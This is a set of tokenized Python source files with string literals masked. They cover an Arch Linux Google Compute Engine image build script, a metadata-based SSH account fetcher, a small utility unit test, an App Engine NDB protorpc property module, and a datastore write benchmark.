<s> import logging <EOL> import os <EOL> import sys <EOL> import utils <EOL> ETC_MOTD = '''<STR_LIT>''' <EOL> ETC_HOSTS = '''<STR_LIT>''' <EOL> ETC_SSH_SSH_CONFIG = '''<STR_LIT>''' <EOL> ETC_SSH_SSHD_CONFIG = '''<STR_LIT>''' <EOL> ETC_SYSCTL_D_70_DISABLE_IPV6_CONF = '''<STR_LIT>''' <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_STRONGLY_RECOMMENDED_CONF = '''<STR_LIT>''' <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_RECOMMENDED_CONF = '''<STR_LIT>''' <EOL> ETC_PAM_D_PASSWD = '''<STR_LIT>''' <EOL> ETC_SUDOERS_D_ADD_GROUP_ADM = '''<STR_LIT>''' <EOL> ETC_FAIL2BAN_JAIL_LOCAL = '''<STR_LIT>''' <EOL> ETC_FAIL2BAN_JAIL_D_SSHD_CONF = '''<STR_LIT>''' <EOL> GCIMAGEBUNDLE_ARCH_PY = '''<STR_LIT>''' <EOL> def main ( ) : <EOL> args = utils . DecodeArgs ( sys . argv [ <NUM_LIT:1> ] ) <EOL> utils . SetupLogging ( quiet = args [ '<STR_LIT>' ] , verbose = args [ '<STR_LIT>' ] ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> SetupLocale ( ) <EOL> ConfigureTimeZone ( ) <EOL> ConfigureKernel ( ) <EOL> InstallBootloader ( args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] ) <EOL> ForwardSystemdToConsole ( ) <EOL> SetupNtpServer ( ) <EOL> SetupNetwork ( ) <EOL> SetupSsh ( ) <EOL> SetupAccounts ( args ) <EOL> InstallGcePackages ( args [ '<STR_LIT>' ] ) <EOL> ConfigMessageOfTheDay ( ) <EOL> ConfigureSecurity ( ) <EOL> ConfigureSerialPortOutput ( ) <EOL> DisableUnusedServices ( ) <EOL> OptimizePackages ( ) <EOL> def SetupAccounts ( args ) : <EOL> accounts = args [ '<STR_LIT>' ] <EOL> if accounts : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> for account in accounts : <EOL> username , password = account . split ( '<STR_LIT::>' ) <EOL> logging . info ( '<STR_LIT>' , username ) <EOL> utils . Run ( [ '<STR_LIT>' , username , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . Run ( '<STR_LIT>' % ( username , password ) , shell = True ) <EOL> def OptimizePackages ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Pacman ( [ '<STR_LIT>' ] ) <EOL> utils . Pacman ( [ '<STR_LIT>' ] ) <EOL> utils . Run ( [ '<STR_LIT>' ] ) <EOL> def SetupLocale ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . SetupArchLocale ( ) <EOL> def ConfigureTimeZone ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def ConfigureKernel ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Replace ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> utils . Replace ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:-c>' , '<STR_LIT>' ] ) <EOL> def InstallBootloader ( device , uuid , debugmode ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' , device ] ) <EOL> utils . CreateDirectory ( '<STR_LIT>' ) <EOL> utils . CopyFiles ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . Replace ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , device ] ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' % device ] ) <EOL> boot_params = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if debugmode : <EOL> boot_params += [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ] <EOL> boot_params = '<STR_LIT:U+0020>' . join ( boot_params ) <EOL> boot_spec = '<STR_LIT>' % ( uuid , boot_params ) <EOL> utils . ReplaceLine ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> boot_spec ) <EOL> def DisableUnusedServices ( ) : <EOL> utils . DisableService ( '<STR_LIT>' ) <EOL> utils . DisableService ( '<STR_LIT>' ) <EOL> def ForwardSystemdToConsole ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . AppendFile ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def SetupNtpServer ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def SetupNetwork ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_HOSTS ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_SYSCTL_D_70_DISABLE_IPV6_CONF ) <EOL> utils . Symlink ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> def SetupSsh ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_SSH_SSH_CONFIG ) <EOL> utils . Chmod ( '<STR_LIT>' , <NUM_LIT> ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_SSH_SSHD_CONFIG ) <EOL> utils . Chmod ( '<STR_LIT>' , <NUM_LIT> ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> def SetupFail2ban ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Pacman ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_FAIL2BAN_JAIL_LOCAL ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_FAIL2BAN_JAIL_D_SSHD_CONF ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> def ConfigureSecurity ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_STRONGLY_RECOMMENDED_CONF ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_RECOMMENDED_CONF ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:root>' ] ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_PAM_D_PASSWD ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_SUDOERS_D_ADD_GROUP_ADM ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def ConfigureSerialPortOutput ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Sed ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . ReplaceLine ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def InstallImportedPackages ( packages_dir ) : <EOL> aur_packages_dir = os . path . join ( packages_dir , '<STR_LIT>' ) <EOL> for aur_package in os . listdir ( aur_packages_dir ) : <EOL> utils . Pacman ( '<STR_LIT>' , aur_package , cwd = aur_packages_dir ) <EOL> def InstallGcePackages ( packages_dir ) : <EOL> try : <EOL> InstallGoogleCloudSdk ( ) <EOL> except : <EOL> pass <EOL> try : <EOL> InstallComputeImagePackages ( packages_dir ) <EOL> except : <EOL> pass <EOL> def InstallComputeImagePackages ( packages_dir ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> packages_dir ] , <EOL> shell = True ) <EOL> utils . CopyFiles ( os . path . join ( packages_dir , '<STR_LIT>' , '<STR_LIT:*>' ) , '<STR_LIT:/>' ) <EOL> utils . CopyFiles ( os . path . join ( packages_dir , '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> '<STR_LIT:/>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . DeleteDirectory ( packages_dir ) <EOL> def InstallGcimagebundle ( packages_dir ) : <EOL> utils . WriteFile ( <EOL> os . path . join ( packages_dir , '<STR_LIT>' ) , <EOL> GCIMAGEBUNDLE_ARCH_PY ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = os . path . join ( packages_dir , '<STR_LIT>' ) ) <EOL> def PatchGoogleSystemdService ( file_path ) : <EOL> utils . ReplaceLine ( file_path , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . ReplaceLine ( file_path , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def InstallGoogleCloudSdk ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> usr_share_google = '<STR_LIT>' <EOL> archive = os . path . join ( usr_share_google , '<STR_LIT>' ) <EOL> unzip_dir = os . path . join ( usr_share_google , '<STR_LIT>' ) <EOL> utils . CreateDirectory ( usr_share_google ) <EOL> utils . DownloadFile ( <EOL> '<STR_LIT>' , archive ) <EOL> utils . Run ( [ '<STR_LIT>' , archive , '<STR_LIT>' , usr_share_google ] ) <EOL> utils . AppendFile ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> utils . Run ( [ os . path . join ( unzip_dir , '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT:false>' , <EOL> '<STR_LIT>' , '<STR_LIT:true>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:true>' ] , <EOL> cwd = unzip_dir , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> utils . Symlink ( os . path . join ( unzip_dir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> utils . Symlink ( os . path . join ( unzip_dir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> utils . Symlink ( os . path . join ( unzip_dir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( archive ) <EOL> def ConfigMessageOfTheDay ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_MOTD ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import json <EOL> import logging <EOL> import time <EOL> import urllib2 <EOL> METADATA_URL = '<STR_LIT>' <EOL> METADATA_HANG = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def KeyHasExpired ( key ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( '<STR_LIT>' , key ) <EOL> try : <EOL> schema , json_str = key . split ( None , <NUM_LIT:3> ) [ <NUM_LIT:2> : ] <EOL> except ValueError : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> logging . debug ( '<STR_LIT>' ) <EOL> return False <EOL> if schema != '<STR_LIT>' : <EOL> logging . debug ( '<STR_LIT>' , schema ) <EOL> return False <EOL> logging . debug ( '<STR_LIT>' ) <EOL> logging . debug ( '<STR_LIT>' , json_str ) <EOL> try : <EOL> json_obj = json . loads ( json_str ) <EOL> except ValueError : <EOL> logging . error ( '<STR_LIT>' ) <EOL> return False <EOL> if '<STR_LIT>' not in json_obj : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return False <EOL> expire_str = json_obj [ '<STR_LIT>' ] <EOL> format_str = '<STR_LIT>' <EOL> try : <EOL> expire_time = datetime . datetime . strptime ( expire_str , format_str ) <EOL> except ValueError : <EOL> logging . error ( <EOL> '<STR_LIT>' , expire_str , format_str ) <EOL> logging . error ( '<STR_LIT>' ) <EOL> return False <EOL> return datetime . datetime . utcnow ( ) > expire_time <EOL> def AccountDataToDictionary ( data ) : <EOL> """<STR_LIT>""" <EOL> if not data : <EOL> return { } <EOL> lines = [ line for line in data . splitlines ( ) if line ] <EOL> usermap = { } <EOL> for line in lines : <EOL> split_line = line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> if len ( split_line ) != <NUM_LIT:2> : <EOL> logging . warning ( <EOL> '<STR_LIT>' , split_line ) <EOL> continue <EOL> user , key = split_line <EOL> if KeyHasExpired ( key ) : <EOL> logging . debug ( <EOL> '<STR_LIT>' , user , key ) <EOL> continue <EOL> if user not in usermap : <EOL> usermap [ user ] = [ ] <EOL> usermap [ user ] . append ( key ) <EOL> logging . debug ( '<STR_LIT>' , usermap ) <EOL> return usermap <EOL> class DesiredAccounts ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , time_module = time , urllib2_module = urllib2 ) : <EOL> self . urllib2 = urllib2_module <EOL> self . time = time_module <EOL> self . etag = <NUM_LIT:0> <EOL> def _WaitForUpdate ( self , timeout_secs ) : <EOL> """<STR_LIT>""" <EOL> request_url = METADATA_URL + METADATA_HANG % ( timeout_secs , self . etag ) <EOL> logging . debug ( '<STR_LIT>' , request_url ) <EOL> request = urllib2 . Request ( request_url ) <EOL> request . add_header ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return self . urllib2 . urlopen ( request , timeout = timeout_secs * <NUM_LIT> ) <EOL> def _GetMetadataUpdate ( self , timeout_secs = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> response = self . _WaitForUpdate ( timeout_secs = timeout_secs ) <EOL> response_info = response . info ( ) <EOL> if response_info and response_info . has_key ( '<STR_LIT>' ) : <EOL> self . etag = response_info . getheader ( '<STR_LIT>' ) <EOL> content = response . read ( ) <EOL> logging . debug ( '<STR_LIT>' , content ) <EOL> return content <EOL> except urllib2 . HTTPError as e : <EOL> if e . code == <NUM_LIT> : <EOL> return None <EOL> raise <EOL> return None <EOL> def GetDesiredAccounts ( self ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( '<STR_LIT>' ) <EOL> metadata_content = self . _GetMetadataUpdate ( ) <EOL> metadata_dict = json . loads ( metadata_content or '<STR_LIT:{}>' ) <EOL> account_data = None <EOL> try : <EOL> instance_data = metadata_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> project_data = metadata_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> valid_keys = [ instance_data . get ( '<STR_LIT>' ) , instance_data . get ( '<STR_LIT>' ) ] <EOL> block_project = instance_data . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) <EOL> if block_project != '<STR_LIT:true>' and not instance_data . get ( '<STR_LIT>' ) : <EOL> valid_keys . append ( project_data . get ( '<STR_LIT>' ) ) <EOL> valid_keys . append ( project_data . get ( '<STR_LIT>' ) ) <EOL> valid_keys = [ key for key in valid_keys if key ] <EOL> account_data = '<STR_LIT:\n>' . join ( valid_keys ) <EOL> except KeyError : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> return AccountDataToDictionary ( account_data ) </s>
<s> """<STR_LIT>""" <EOL> __pychecker__ = '<STR_LIT>' <EOL> import logging <EOL> import subprocess <EOL> import unittest <EOL> import uuid <EOL> from gcimagebundlelib import utils <EOL> class ImageBundleTest ( unittest . TestCase ) : <EOL> def testRunCommand ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . RunCommand ( [ '<STR_LIT>' , '<STR_LIT:/>' ] ) <EOL> def testRunCommandThatFails ( self ) : <EOL> """<STR_LIT>""" <EOL> def RunCommandUnderTest ( ) : <EOL> non_existent_path = '<STR_LIT:/>' + uuid . uuid4 ( ) . hex <EOL> utils . RunCommand ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , non_existent_path ] ) <EOL> self . assertRaises ( subprocess . CalledProcessError , RunCommandUnderTest ) <EOL> def main ( ) : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> unittest . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from protorpc import messages <EOL> from protorpc import remote <EOL> from . import model <EOL> from . import utils <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _protocols_registry = remote . Protocols . new_default ( ) <EOL> _default_protocol = '<STR_LIT>' <EOL> class EnumProperty ( model . IntegerProperty ) : <EOL> """<STR_LIT>""" <EOL> _enum_type = None <EOL> _attributes = [ '<STR_LIT>' ] + model . IntegerProperty . _attributes <EOL> _positional = <NUM_LIT:1> + model . IntegerProperty . _positional <EOL> @ utils . positional ( <NUM_LIT:1> + _positional ) <EOL> def __init__ ( self , enum_type , name = None , default = None , choices = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> self . _enum_type = enum_type <EOL> if default is not None : <EOL> self . _validate ( default ) <EOL> if choices is not None : <EOL> map ( self . _validate , choices ) <EOL> super ( EnumProperty , self ) . __init__ ( name , default = default , <EOL> choices = choices , ** kwds ) <EOL> def _validate ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , self . _enum_type ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( self . _enum_type . __name__ , value ) ) <EOL> def _to_base_type ( self , enum ) : <EOL> """<STR_LIT>""" <EOL> return enum . number <EOL> def _from_base_type ( self , val ) : <EOL> """<STR_LIT>""" <EOL> return self . _enum_type ( val ) <EOL> def _analyze_indexed_fields ( indexed_fields ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for field_name in indexed_fields : <EOL> if not isinstance ( field_name , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % ( field_name , ) ) <EOL> if '<STR_LIT:.>' not in field_name : <EOL> if field_name in result : <EOL> raise ValueError ( '<STR_LIT>' % field_name ) <EOL> result [ field_name ] = None <EOL> else : <EOL> head , tail = field_name . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> if head not in result : <EOL> result [ head ] = [ tail ] <EOL> elif result [ head ] is None : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( field_name , head ) ) <EOL> else : <EOL> result [ head ] . append ( tail ) <EOL> return result <EOL> def _make_model_class ( message_type , indexed_fields , ** props ) : <EOL> """<STR_LIT>""" <EOL> analyzed = _analyze_indexed_fields ( indexed_fields ) <EOL> for field_name , sub_fields in analyzed . iteritems ( ) : <EOL> if field_name in props : <EOL> raise ValueError ( '<STR_LIT>' % field_name ) <EOL> try : <EOL> field = message_type . field_by_name ( field_name ) <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( message_type . __name__ , field_name ) ) <EOL> if isinstance ( field , messages . MessageField ) : <EOL> if not sub_fields : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % field_name ) <EOL> sub_model_class = _make_model_class ( field . type , sub_fields ) <EOL> prop = model . StructuredProperty ( sub_model_class , field_name , <EOL> repeated = field . repeated ) <EOL> else : <EOL> if sub_fields is not None : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % field_name ) <EOL> if isinstance ( field , messages . EnumField ) : <EOL> prop = EnumProperty ( field . type , field_name , repeated = field . repeated ) <EOL> elif isinstance ( field , messages . BytesField ) : <EOL> prop = model . BlobProperty ( field_name , <EOL> repeated = field . repeated , indexed = True ) <EOL> else : <EOL> prop = model . GenericProperty ( field_name , repeated = field . repeated ) <EOL> props [ field_name ] = prop <EOL> return model . MetaModel ( '<STR_LIT>' % message_type . __name__ , <EOL> ( model . Model , ) , props ) <EOL> class MessageProperty ( model . StructuredProperty ) : <EOL> """<STR_LIT>""" <EOL> _message_type = None <EOL> _indexed_fields = ( ) <EOL> _protocol = _default_protocol <EOL> _protocol_impl = None <EOL> _attributes = ( [ '<STR_LIT>' ] + model . StructuredProperty . _attributes [ <NUM_LIT:1> : ] + <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ utils . positional ( <NUM_LIT:1> + model . StructuredProperty . _positional ) <EOL> def __init__ ( self , message_type , name = None , <EOL> indexed_fields = None , protocol = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( message_type , type ) and <EOL> issubclass ( message_type , messages . Message ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . _message_type = message_type <EOL> if indexed_fields is not None : <EOL> self . _indexed_fields = tuple ( indexed_fields ) <EOL> if protocol is None : <EOL> protocol = _default_protocol <EOL> self . _protocol = protocol <EOL> self . _protocol_impl = _protocols_registry . lookup_by_name ( protocol ) <EOL> blob_prop = model . BlobProperty ( '<STR_LIT>' % self . _protocol ) <EOL> message_class = _make_model_class ( message_type , self . _indexed_fields , <EOL> blob_ = blob_prop ) <EOL> super ( MessageProperty , self ) . __init__ ( message_class , name , ** kwds ) <EOL> def _validate ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( msg , self . _message_type ) : <EOL> raise TypeError ( '<STR_LIT>' , <EOL> self . _message_type . __name__ , <EOL> self . _code_name or self . _name ) <EOL> def _to_base_type ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> ent = _message_to_entity ( msg , self . _modelclass ) <EOL> ent . blob_ = self . _protocol_impl . encode_message ( msg ) <EOL> return ent <EOL> def _from_base_type ( self , ent ) : <EOL> """<STR_LIT>""" <EOL> if ent . _projection : <EOL> return _projected_entity_to_message ( ent , self . _message_type ) <EOL> blob = ent . blob_ <EOL> if blob is not None : <EOL> protocol = self . _protocol_impl <EOL> else : <EOL> protocol = None <EOL> for name in _protocols_registry . names : <EOL> key = '<STR_LIT>' % name <EOL> if key in ent . _values : <EOL> blob = ent . _values [ key ] <EOL> if isinstance ( blob , model . _BaseValue ) : <EOL> blob = blob . b_val <EOL> protocol = _protocols_registry . lookup_by_name ( name ) <EOL> break <EOL> if blob is None or protocol is None : <EOL> return None <EOL> msg = protocol . decode_message ( self . _message_type , blob ) <EOL> return msg <EOL> def _message_to_entity ( msg , modelclass ) : <EOL> """<STR_LIT>""" <EOL> ent = modelclass ( ) <EOL> for prop_name , prop in modelclass . _properties . iteritems ( ) : <EOL> if prop . _code_name == '<STR_LIT>' : <EOL> continue <EOL> value = getattr ( msg , prop_name ) <EOL> if value is not None and isinstance ( prop , model . StructuredProperty ) : <EOL> if prop . _repeated : <EOL> value = [ _message_to_entity ( v , prop . _modelclass ) for v in value ] <EOL> else : <EOL> value = _message_to_entity ( value , prop . _modelclass ) <EOL> setattr ( ent , prop_name , value ) <EOL> return ent <EOL> def _projected_entity_to_message ( ent , message_type ) : <EOL> """<STR_LIT>""" <EOL> msg = message_type ( ) <EOL> analyzed = _analyze_indexed_fields ( ent . _projection ) <EOL> for name , sublist in analyzed . iteritems ( ) : <EOL> prop = ent . _properties [ name ] <EOL> val = prop . _get_value ( ent ) <EOL> assert isinstance ( prop , model . StructuredProperty ) == bool ( sublist ) <EOL> if sublist : <EOL> field = message_type . field_by_name ( name ) <EOL> assert isinstance ( field , messages . MessageField ) <EOL> assert prop . _repeated == field . repeated <EOL> if prop . _repeated : <EOL> assert isinstance ( val , list ) <EOL> val = [ _projected_entity_to_message ( v , field . type ) for v in val ] <EOL> else : <EOL> assert isinstance ( val , prop . _modelclass ) <EOL> val = _projected_entity_to_message ( val , field . type ) <EOL> setattr ( msg , name , val ) <EOL> return msg </s>
<s> """<STR_LIT>""" <EOL> import cProfile <EOL> import os <EOL> import pstats <EOL> import sys <EOL> import time <EOL> from google . appengine . ext import testbed <EOL> tb = testbed . Testbed ( ) <EOL> tb . activate ( ) <EOL> tb . init_datastore_v3_stub ( ) <EOL> tb . init_memcache_stub ( ) <EOL> from google . appengine . ext import db <EOL> import ndb <EOL> N = <NUM_LIT:1000> <EOL> class Person ( db . Model ) : <EOL> a0 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a1 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a2 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a3 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a4 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a5 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a6 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a7 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a8 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a9 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> OldPerson = Person <EOL> class Person ( ndb . Model ) : <EOL> a0 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a1 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a2 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a3 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a4 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a5 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a6 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a7 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a8 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a9 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> NewPerson = Person <EOL> def put_old ( people ) : <EOL> keys = db . put ( people ) <EOL> def put_new ( people ) : <EOL> keys = ndb . put_multi ( people , use_cache = False , use_memcache = False ) <EOL> def timer ( func , people ) : <EOL> t0 = time . time ( ) <EOL> func ( people ) <EOL> t1 = time . time ( ) <EOL> print '<STR_LIT>' % ( t1 - t0 ) <EOL> def main ( k = <NUM_LIT:0> ) : <EOL> if k > <NUM_LIT:0> : <EOL> return main ( k - <NUM_LIT:1> ) <EOL> try : <EOL> n = int ( sys . argv [ - <NUM_LIT:1> ] ) <EOL> except : <EOL> n = N <EOL> if '<STR_LIT>' in sys . argv and '<STR_LIT>' not in sys . argv : <EOL> people = [ OldPerson ( ) for i in xrange ( n ) ] <EOL> func = put_old <EOL> elif '<STR_LIT>' in sys . argv and '<STR_LIT>' not in sys . argv : <EOL> people = [ NewPerson ( ) for i in xrange ( n ) ] <EOL> func = put_new <EOL> else : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> prof = cProfile . Profile ( ) <EOL> prof = prof . runctx ( '<STR_LIT>' , globals ( ) , locals ( ) ) <EOL> stats = pstats . Stats ( prof ) <EOL> stats . strip_dirs ( ) <EOL> stats . sort_stats ( '<STR_LIT>' ) <EOL> stats . print_stats ( <NUM_LIT:20> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( <NUM_LIT:9> ) </s>
